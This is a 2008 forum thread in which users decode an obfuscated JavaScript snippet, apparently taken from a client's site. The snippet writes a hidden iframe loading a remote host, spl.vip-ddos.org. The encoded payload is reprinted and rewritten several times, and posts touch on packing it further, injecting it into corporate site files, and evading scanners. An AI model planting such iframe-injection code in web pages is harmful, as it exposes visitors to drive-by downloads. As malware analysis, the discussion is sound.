Is this a Trojan?

**sn1per** · 03-10-2008, 09:30 AM

**emo porn** · 03-10-2008, 10:27 AM

there is no spoon

**tom jones** · 03-10-2008, 11:19 AM

Looks weird, but it might be a trojan seeing all those #'s

**silent3k** · 03-10-2008, 11:29 AM

ROFL ^^^

**RonMexico** · 03-10-2008, 11:51 AM

jamal giving computer advice ITT

ps. Yessur I balleev its a trojan

**RonMexico** · 03-10-2008, 11:57 AM

Possibly Trojan-Trojan Downloader.JS.Agent.bbi

**mcbain** · 03-11-2008, 12:12 PM

i use to have code to decode anything that looked like that. Bassicalyy .innerHtml function would always return unencrypted stuff. ill see if i can find it

**mhu** · 03-11-2008, 12:24 PM

Originally Posted by Jamal

Looks weird, but it might be a trojan seeing all those #'s

oh...my...god

j/w, have you ever written any code?

**mhu** · 03-11-2008, 12:25 PM

Originally Posted by sn1per

function decode()
}
{
What does it all mean?

what does function decode() do. post what the code is for that

**Moose** · 03-11-2008, 12:33 PM

That is the function decode()

**mhu** · 03-11-2008, 12:36 PM

Originally Posted by Moose

That is the function decode()

ah shit i got my stuff backwards. I should do my homework some time and maybe I wouldn't do that :P

i thought it was passing that data in at first. oops.

**mhu** · 03-11-2008, 12:38 PM

that just looks like a math problem, maybe we can solve it???

definitely not a virus

lemme see what the answer is to that real quick and maybe we can find out

**mhu** · 03-11-2008, 12:43 PM

its almost like some sort of encryption algorithm or something

**emo porn** · 03-11-2008, 12:49 PM

^ ROFL

**mhu** · 03-11-2008, 12:50 PM

im trying to solve it by using sample input of '012345' but my mind is too weak to keep up with it. i would need to compile it to get answer.

**mhu** · 03-11-2008, 12:50 PM

i give up this is pointless.

**sn1per** · 03-11-2008, 12:51 PM

lulz at this thread MHU <3

ron mexico hit it on the money.

**mhu** · 03-11-2008, 12:53 PM

was this thread serious or what

cuz i can't tell what it is. Just some program that moves some numbers around.

**sn1per** · 03-11-2008, 01:00 PM

No, it was a serious thread. I won't bore you with the details, it just had to do with a client of ours.

I wanted to see exactly what the code was but I knew it came up as a downloader.

**Vershun** · 03-11-2008, 01:05 PM

Are you guys serious serious? It's a javascript with a document.write in it o.O.

Make a .html, do a javascript chunk and call the decode function, then view the generated source.

HTML file:

Code:

<script type="text/javascript">
function decode() {
var t,o,l,i,j;
var s='';
s=s+'060047116101120116097116101097062060047116101120116097114101097062';
s=s+'060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046';
s=s+'111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115';
s=s+'116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109';
s=s+'101062';
t=''; l=s.length; i=0;
while(i < (l-1)) {
for(j=0;j<3;j++)
{
t=t+s.charAt(i);
i++;
}
document.write(String.fromCharCode(t));
t='';
}
}

decode();
</script>

It generates:

Code:

<iframe src="http://spl.vip-ddos.org/index.php" style="visibility: hidden;" height="1" width="1"></iframe>

**sn1per** · 03-11-2008, 01:07 PM

Bout time vershun chimed in, i was hoping for this earlier.

**mhu** · 03-11-2008, 01:24 PM

fuck

i fail

i totally forgot thats what the last part of that code did.

**pulaskeet** · 03-11-2008, 01:25 PM

Just so you know...

document.write(String.fromCharCode(t));

document.write(.....);

That will write something to the document or the html pane.

String.fromCharCode(t)

That will grab a characters value at the char code t.
So basically, it iterates through that list of numbers and gets the char from the integer, then by the time it gets to writing, it converts from char to string

**mhu** · 03-11-2008, 01:26 PM

Originally Posted by pulaskeet

Just so you know...

document.write(.....);

That will write something to the document or the html pane.

String.fromCharCode(t)

That will grab a characters value at the integer t. If you look at a character map, every letter on your keyboard (plus moar) have a number used as a reference.

So basically, it iterates through that list of numbers and prints the character number for each number, which results in what Vershun posted.

god i am such a fucking tard

i saw it grabbed 3 numbers at a time and at no point in that did i actually think it could be a character reference

**pulaskeet** · 03-11-2008, 01:28 PM

it actually works a little differently, i wrote that after glancing at it for a sec, but yea same concept

**pulaskeet** · 03-11-2008, 01:29 PM

they go from number -> char -> string

**Krazy** · 03-11-2008, 02:00 PM

Originally Posted by Vershun

Are you guys serious serious? It's a javascript with a document.write in it o.O.

Make a .html, do a javascript chunk and call the decode function, then view the generated source.

HTML file:

Code:

<script type="text/javascript">
function decode() {
var t,o,l,i,j;
var s='';
s=s+'060047116101120116097116101097062060047116101120116097114101097062';
s=s+'060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046';
s=s+'111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115';
s=s+'116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109';
s=s+'101062';
t=''; l=s.length; i=0;
while(i < (l-1)) {
for(j=0;j<3;j++)
{
t=t+s.charAt(i);
i++;
}
document.write(String.fromCharCode(t));
t='';
}
}

decode();
</script>

It generates:

Code:

<iframe src="http://spl.vip-ddos.org/index.php" style="visibility: hidden;" height="1" width="1"></iframe>

**Moose** · 03-11-2008, 02:01 PM

it actually generates:

Code:

</textatea></textarea><iframe src="http://spl.vip-ddos.org/index.php" width=1 height=1 style="visibility: hidden"></iframe>

**Moose** · 03-11-2008, 02:01 PM

and pretty in-efficiently too...

Code:

		void decode()
		{
			string s = string.Empty;
			string t = string.Empty;
			int i = 0;
			int l = 0;
			int j = 0;
			s += "060047116101120116097116101097062060047116101120116097114101097062";
			s += "060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046";
			s += "111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115";
			s += "116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109";
			s += "101062";

			l = s.Length - 1;

			while (i < l)
			{
				for (j = 0; j < 3; ++j)
				{
					t += s[i];
					i++;
				}
				Console.Write(char.ConvertFromUtf32(Convert.ToInt32(t)));
				t = "";
			}
		}

**david blaine** · 03-11-2008, 02:03 PM

ok i know this is a help forum, but you guys are seriously retarded.....

**pulaskeet** · 03-11-2008, 02:03 PM

hahaah moose i was thinking the same thing, god we're nerds

**pulaskeet** · 03-11-2008, 02:04 PM

Originally Posted by ytcracker

even if a question is seemingly retarded, there is no need to berate someone for no raisin.

**sn1per** · 03-11-2008, 02:09 PM

I actually learned alot, thanks everyone <#

**Moose** · 03-11-2008, 02:20 PM

this is a little better, still kinda shitty:

Code:

			string s = string.Empty;
			s += "060047116101120116097116101097062060047116101120116097114101097062";
			s += "060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046";
			s += "111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115";
			s += "116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109";
			s += "101062";

			string output = string.Empty;
			for (int i = 0, cnt = s.Length - 1; i < cnt; i += 3)
				output += char.ConvertFromUtf32(Convert.ToInt32(s.Substring(i, 3))).ToString();
			Console.WriteLine(output);

versh, pulaskeet... comments?

**Moose** · 03-11-2008, 02:20 PM

lotta boxing/unboxing conversion bullshit going on... I dont get it...

**pulaskeet** · 03-11-2008, 02:37 PM

Code:

function decode() {
    var t,i, s='';
    s=s+'060047116101120116097116101097062060047116101120116097114101097062';
    s=s+'060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046';
    s=s+'111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115';
    s=s+'116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109';
    s=s+'101062';
    
    t = '';
    for (i=0; i < s.length; i+=3)
      t += String.fromCharCode(s.substring(i, i+3));
      
    document.write(t);
}

assuming we're still talking about js

**pulaskeet** · 03-11-2008, 02:40 PM

i still don't know why people would use that method for encoding since basically you can just copy t to the clipboard and be on your merry way

**Moose** · 03-11-2008, 02:44 PM

i changed mine to c#, but pretty much the same code.

**Moose** · 03-11-2008, 02:45 PM

let me get awol in here... he will probably look at it in CIL and over-efficient the hell out of it. but ground rules, the encoding method MUST remain the same: go!

**awol** · 03-11-2008, 02:56 PM

Originally Posted by Moose

let me get awol in here... he will probably look at it in CIL and over-efficient the hell out of it. but ground rules, the encoding method MUST remain the same: go!

I'm missing something? A better way to do the above?

The above is crap, it's a double-encode. Don't bother to keep it the same, use dean edwards packer. http://dean.edwards.name/packer/

But Vershun called it above and so, yes - it's probably a trojan of some kind.

Iframe injection is totally lame...

Now, launching your Trojan at some corporation that looks for .aspx, .php, .cfm, .etc files and injected the above would be pretty l33t.

**Moose** · 03-11-2008, 03:00 PM

Originally Posted by awol

I'm missing something? A better way to do the above?

The above is crap, it's a double-encode. Don't bother to keep it the same, use dean edwards packer. http://dean.edwards.name/packer/

But Vershun called it above and so, yes - it's probably a trojan of some kind.

Iframe injection is totally lame...

Now, launching your Trojan at some corporation that looks for .aspx, .php, .cfm, .etc files and injected the above would be pretty l33t.

w4r3z d4 c0d3?

**RonMexico** · 03-11-2008, 03:03 PM

Originally Posted by MetalHeadsUnite

that just looks like a math problem, maybe we can solve it???

definitely not a virus

lemme see what the answer is to that real quick and maybe we can find out

Originally Posted by MetalHeadsUnite

its almost like some sort of encryption algorithm or something

LOL

**awol** · 03-11-2008, 03:22 PM

Originally Posted by Moose

w4r3z d4 c0d3?

Just for you...

I rewrote the above worthless code with functionally identical worthless code:

Code:

<script>
var s='060047116101120116097116101097062060047116101120116097114101097062060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109101062';
var i = 0, l = s.length;
while (i < l)
    {document.write(String.fromCharCode(s[i] + s[i+1] + s[i+2]); i+=3;} 
</script>

**Vershun** · 03-11-2008, 03:27 PM

I've seen this type of stuff a lot. I'd assume this sort of basic obfuscation is not meant for any sort of encryption benefits (why would you think of a complicated one when everyone can see it and just run the function to decrypt?) but probably to detour automated scans and to offer some sort of obfuscation for casual lookers.

**awol** · 03-11-2008, 03:28 PM

I'd go for obfuscation... (hopefully)

Any decent automated scanner would run the code and actively look for a problem.

**awol** · 03-11-2008, 03:29 PM

Originally Posted by awol

Just for you...

I rewrote the above worthless code with functionally identical worthless code:

Code:

<script>
var s='060047116101120116097116101097062060047116101120116097114101097062060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109101062';
var i = 0, l = s.length;
while (i < l)
    {document.write(String.fromCharCode(s[i] + s[i+1] + s[i+2]); i+=3;} 
</script>

Still waiting for you to performance test this, Moose. I'm waiting to hear that mine is faster :P

**Vershun** · 03-11-2008, 03:43 PM

Originally Posted by awol

I'd go for obfuscation... (hopefully)

Any decent automated scanner would run the code and actively look for a problem.

Think it depends on who's doing it and for what reason. I'm pretty sure Google still doesn't execute any JS.

It's one thing to make a parser using simple regex's vs having an entire JS engine.

**awol** · 03-11-2008, 03:52 PM

True that Google probably doesn't (although they probably will moving forward).

Antivirus/spyware programs will parse compiled code though, which (presumably) defeats the purpose of attempts like the above.

Either way...it's still lame...